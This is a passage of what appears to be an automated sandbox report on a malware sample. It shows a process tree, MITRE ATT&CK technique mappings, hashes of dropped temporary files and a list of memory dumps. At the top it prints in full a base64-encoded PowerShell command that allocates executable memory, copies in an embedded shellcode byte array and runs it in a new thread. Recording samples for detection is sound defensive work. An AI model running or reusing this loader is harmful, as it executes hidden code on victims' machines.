      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAB3AFgAWgBVACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAdwBYAFoAVQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGIALAAwAHgAYwA1ACwAMAB4AGIAYQAsADAAeAA3AGMALAAwAHgAMwA1ACwAMAB4AGEAOAAsADAAeABkADkALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADIAYwAsADAAeAAyADYALAAwAHgANABhACwAMAB4ADIAYwAsADAAeAAzADAALAAwAHgAYQAwACwAMAB4ADAANQAsADAAeABjAGYALAAwAHgAYwA4ACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAZQAxACwAMAB4ADEAYQAsADAAeAA1ADUALAAwAHgAZgAxACwAMAB4ADUAMwAsADAAeABhAGEALAAwAHgAMQBkACwAMAB4ADUANwAsADAAeAA1ADgALAAwAHgANAAxACwAMAB4ADcAMwAsADAAeAA0AGMALAAwAHgAZQA5ACwAMAB4AGIAMAAsADAAeAA3AGIALAAwAHgAZABiACwAMAB4AGEAMwAsADAAeAAxAGMALAAwAHgAMABmACwAMAB4ADUAMQAsADAAeAAxAGMALAAwAHgANQAxACwAMAB4AGYAMAAsADAAeABhADcALAAwAHgAOQBjACwAMAB4ADMAZAAsADAAeAAzADIALAAwAHgAYQA5ACwAMAB4ADYAMAAsADAAeAAzAGYALAAwAHgANgA3ACwAMAB4ADAAOQAsADAAeAA1ADgALAAwAHgAZgAwACwAMAB4ADcAYQAsADAAeAA0ADgALAAwAHgAOQBkACwAMAB4ADQANwAsADAAeABmADAALAAwAHgAYQA1ACwAMAB4ADcAMwAsADAAeABkAGMALAAwAHgAYQA4ACwAMAB4ADIAOQAsADAAeABmAGYALAAwAHgAYQAwACwAMAB4ADcAMAAsADAAeAA0AGIALAAwAHgAMgBmACwAMAB4ADcAMwAsADAAeAAwADIALAAwAHgAMABiACwAMAB4AGIANwAsADAAeABmAGUALAAwAHgAZAA0ACwAMAB4AGYAOAAsADAAeAAwAGIALAAwAHgAMAAxACwAMAB4ADAANQAsADAAeAA4AGIALAAwAHgAYwBjACwAMAB4ADIAMQAsADAAeABmADUALAAwAHgAMAA3ACwAMAB4AGEANAAsADAAeAAzADkALAAwAHgAZgA0ACwAMAB4AGMANAAsADAAeABiADAALAAwAHgAZgAwACwAMAB4ADgAMgAsADAAeABkADYALAAwAHgAZgAzACwAMAB4ADgAOQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADMANQAsADAAeAA3ADIALAAwAHgAOQBlACwAMAB4ADYANAAsADAAeAAwADQALAAwAHgANABjACwAMAB4ADYAMAAsADAAeAA0ADcALAAwAHgANgBhACwAMAB4AGUAMAAsADAAeAA2ADIALAAwAHgAOQBmACwAMAB4ADQAZAAsADAAeAAxADgALAAwAHgAMQAxACwAMAB4AGUAYgAsADAAeABhAGQALAAwAHgAYQA1ACwAMAB4ADIAMgAsADAAeAAyADgALAAwAHgAYwBmACwAMAB4ADcAMQAsADAAeABhADYALAAwAHgAYQBmACwAMAB4ADcANwAsADAAeABmADIALAAwAHgAMQAwACwAMAB4ADEANAAsADAAeAA4ADkALAAwAHgAZAA3ACwAMAB4AGMANwAsADAAeABkAGYALAAwAHgAOAA1ACwAMAB4ADkAYwAsADAAeAA4AGMALAAwAHgAYgA4ACwAMAB4ADgAOQAsADAAeAAyADMALAAwAHgANAAwACwAMAB4AGIAMwAsADAAeABiADYALAAwAHgAYQA4ACwAMAB4ADYANwAsADAAeAAxADQALAAwAHgAMwBmACwAMAB4AGUAYQAsADAAeAA0ADMALAAwAHgAYgAwACwAMAB4ADEAYgAsADAAeABhADkALAAwAHgAZQBhACwAMAB4AGUAMQAsADAAeABjADEALAAwAHgAMQBjACwAMAB4ADEAMgAsADAAeABmADEALAAwAHgAYQBlACwAMAB4AGMAMQAsADAAeABiADYALAAwAHgANwA5ACwAMAB4ADUAYwAsADAAeAAxADQALAAwAHgAYwA2ACwAMAB4ADgAMQAsADAAeAA5AGUALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeAAxADUALAAwAHgANQAyACwAMAB4AGQANwAsADAAeAAyADUALAAwAHgAZQA2ACwAMAB4AGYAYwAsADAAeAA2ADAALAAwAHgANQA1ACwAMAB4AGQANAAsADAAeABhADMALAAwAHgAZABhACwAMAB4AGYAMQAsADAAeAA1ADQALAAwAHgAMgBiACwAMAB4AGMANAAsADAAeAAwADYALAAwAHgAZQBjACwAMAB4ADMAYgAsADAAeABmADcALAAwAHgAZAA5ACwAMAB4ADUANgAsADAAeAAyAGIALAAwAHgAMAA2ACwAMAB4AGQAYQAsADAAeABhADYALAAwAHgANgA1ACwAMAB4AGMAYwAsADAAeAA4AGUALAAwAHgAZgA2ACwAMAB4ADEAZAAsADAAeABlADUALAAwAHgAYQBlACwAMAB4ADkAYwAsADAAeABkAGQALAAwAHgAMABhACwAMAB4ADcAYgAsADAAeAAwADgALAAwAHgAZAA0ACwAMAB4ADkAYwAsADAAeAA0ADQALAAwAHgANgA1ACwAMAB4AGUAOQAsADAAeAA1ADYALAAwAHgAMgBkACwAMAB4ADcANAAsADAAeABlAGEALAAwAHgANwA3ACwAMAB4AGYAMQAsADAAeABmADEALAAwAHgAMABjACwAMAB4ADIANwAsADAAeAA1ADkALAAwAHgANQAyACwAMAB4ADgAMQAsADAAeAA4ADcALAAwAHgAMAA5ACwAMAB4ADEAMgAsADAAeAA3ADEALAAwAHgANgBmACwAMAB4ADQAMAAsADAAeAA5AGQALAAwAHgAYQBlACwAMAB4ADgAZgAsADAAeAA2AGIALAAwAHgANwA3ACwAMAB4AGMANwAsADAAeAAyADUALAAwAHgAOAA0ACwAMAB4ADIAZQAsADAAeABiAGYALAAwAHgAZAAxACwAMAB4ADMAZAAsADAAeAA2AGIALAAwAHgANABiACwAMAB4ADQAMAAsADAAeABjADEALAAwAHgAYQAxACwAMAB4ADMAMQAsADAAeAA0ADIALAAwAHgANAA5ACwAMAB4ADQANgAsADAAeABjADUALAAwAHgAMABjACwAMAB4AGIAYQAsADAAeAAyADMALAAwAHgAZAA1ACwAMAB4AGYAOAAsADAAeAA0AGEALAAwAHgANwBlACwAMAB4ADgANwAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4ADUANAAsADAAeABhADIALAAwAHgANABlACwAMAB4AGMAMAAsADAAeAA1ADMALAAwAHgANgA1ACwAMAB4ADEAOQAsADAAeAA3AGMALAAwAHgANQBlACwAMAB4ADUAMAAsADAAeAA2AGQALAAwAHgAMgAzACwAMAB4AGEAMQAsADAAeABiADcALAAwAHgAZQA2ACwAMAB4AGUAYQAsADAAeAAzADcALAAwAHgANwA4ACwAMAB4ADkAMAAsADAAeAAxADIALAAwAHgAZAA4ACwAMAB4ADcAOAAsADAAeAA2ADAALAAwAHgANAA1ACwAMAB4AGIAMgAsADAAeAA3ADgALAAwAHgAMAA4ACwAMAB4ADMAMQAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADIAZAAsADAAeAAzAGUALAAwAHgAMwAzACwAMAB4ADUAZgAsADAAeABmAGUALAAwAHgAYQBiACwAMAB4AGIAYwAsADAAeAAzADYALAAwAHgANQAzACwAMAB4ADcAYgAsADAAeABkADUALAAwAHgAYgA0ACwAMAB4ADgAYQAsADAAeAA0AGIALAAwAHgANwBhACwAMAB4ADQANgAsADAAeABmADkALAAwAHgANABkACwAMAB4ADQANgAsADAAeAA5ADEALAAwAHgAYwA3ACwAMAB4ADMAYgAsADAAeABhADYALAAwAHgAMgAxADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABlADAAaAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAZQAwAGgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGUAMABoACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:744
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vrc1isda\vrc1isda.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:396
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FFD.tmp" "c:\Users\Admin\AppData\Local\Temp\vrc1isda\CSC5CC7A5E9BB23425991F922FE3D57D597.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7FFD.tmp

Filesize
1KB

MD5
36c0338d28c05568af4ca30ad43771c4

SHA1
6ba420891869f98080c68bf70ee34dbd848747c2

SHA256
9ef3e458b9ab603e5658ff1f7b0e2dce718fe6e2d19034a1f54e7899da611a82

SHA512
0490024d6c4f01fffd630a0653c62c71343b2faf79d7367f59a6a70b306731245c379b94fe5658bb1100256e219975633969c744112b64bd4c47ac765de2a593

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2yri3szn.xfm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vrc1isda\vrc1isda.dll

Filesize
3KB

MD5
1e4308a54f637565737a47014e736276

SHA1
c6e7536a801463a8035650a1b319beba87ccd87b

SHA256
a05c324018325cf8a40552bccc2539cd8c21aaea2645bf178738f72955b800c3

SHA512
47033fabe1e809d1958c7eb5af1b0e2f3a42bbde7104c398d48937115b7df813246ace3877c46d1d992ee9090ccbe06bc539537068d2b76ff5146ed347ce6206

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vrc1isda\CSC5CC7A5E9BB23425991F922FE3D57D597.TMP

Filesize
652B

MD5
20953518d4018748c617f002bb414906

SHA1
e46e5b9957cfcd794e05507e8e6a42f4286d0059

SHA256
4b72a75cdc976fda33cd73448f5148f1cef83b47c6395501618f8b894fa10d18

SHA512
93e4216f3adf3828e972480b7e977801d0819e3e03a5c9d9c79759f776f04a1ae5772c9275dcc234a01e3aabd9d5174ede48211c1ab155a9f173abc02c2063c6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vrc1isda\vrc1isda.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vrc1isda\vrc1isda.cmdline

Filesize
369B

MD5
d0f441fab355ce73370d15227a199fc3

SHA1
a4cf6b65b8f5d8f791eeee213b9eb55a2512b6f6

SHA256
6737e0479a6d5020d878fcbea039083d844dfcde910d3af8a73044ab081606d4

SHA512
6f6c26b320d04a3b81a5c26c7b0823c63d8f84765a1bc1af25dc84dbc3ec58149a35ff3ba0379bbca0b16fa4eef44aa8c6fb90a6e30ecd182dec856c8ef6ff6b

Download Submit
memory/744-15-0x000000007470E000-0x000000007470F000-memory.dmp

Filesize
4KB

Download
memory/744-34-0x0000000006130000-0x000000000617C000-memory.dmp

Filesize
304KB

Download
memory/744-16-0x0000000002B50000-0x0000000002B86000-memory.dmp

Filesize
216KB

Download
memory/744-18-0x0000000005300000-0x0000000005928000-memory.dmp

Filesize
6.2MB

Download
memory/744-17-0x0000000074700000-0x0000000074EB0000-memory.dmp

Filesize
7.7MB

Download
memory/744-19-0x0000000074700000-0x0000000074EB0000-memory.dmp

Filesize
7.7MB

Download
memory/744-20-0x0000000005250000-0x0000000005272000-memory.dmp

Filesize
136KB

Download
memory/744-21-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/744-22-0x0000000005A10000-0x0000000005A76000-memory.dmp

Filesize
408KB

Download
memory/744-32-0x0000000005B00000-0x0000000005E54000-memory.dmp

Filesize
3.3MB

Download
memory/744-33-0x0000000006110000-0x000000000612E000-memory.dmp

Filesize
120KB

Download
memory/744-54-0x0000000074700000-0x0000000074EB0000-memory.dmp

Filesize
7.7MB

Download
memory/744-35-0x0000000007950000-0x0000000007FCA000-memory.dmp

Filesize
6.5MB

Download
memory/744-36-0x0000000006640000-0x000000000665A000-memory.dmp

Filesize
104KB

Download
memory/744-53-0x000000007470E000-0x000000007470F000-memory.dmp

Filesize
4KB

Download
memory/744-51-0x00000000072E0000-0x00000000072E1000-memory.dmp

Filesize
4KB

Download
memory/744-49-0x00000000066D0000-0x00000000066D8000-memory.dmp

Filesize
32KB

Download
memory/4012-2-0x0000018FE0830000-0x0000018FE0852000-memory.dmp

Filesize
136KB

Download
memory/4012-12-0x00007FFBA6ED0000-0x00007FFBA7991000-memory.dmp

Filesize
10.8MB

Download
memory/4012-13-0x00007FFBA6ED0000-0x00007FFBA7991000-memory.dmp

Filesize
10.8MB

Download
memory/4012-52-0x00007FFBA6ED0000-0x00007FFBA7991000-memory.dmp

Filesize
10.8MB

Download
memory/4012-14-0x00007FFBA6ED0000-0x00007FFBA7991000-memory.dmp

Filesize
10.8MB

Download
memory/4376-1-0x00007FFBA6ED3000-0x00007FFBA6ED5000-memory.dmp

Filesize
8KB

Download
memory/4376-0-0x0000000000870000-0x000000000087A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads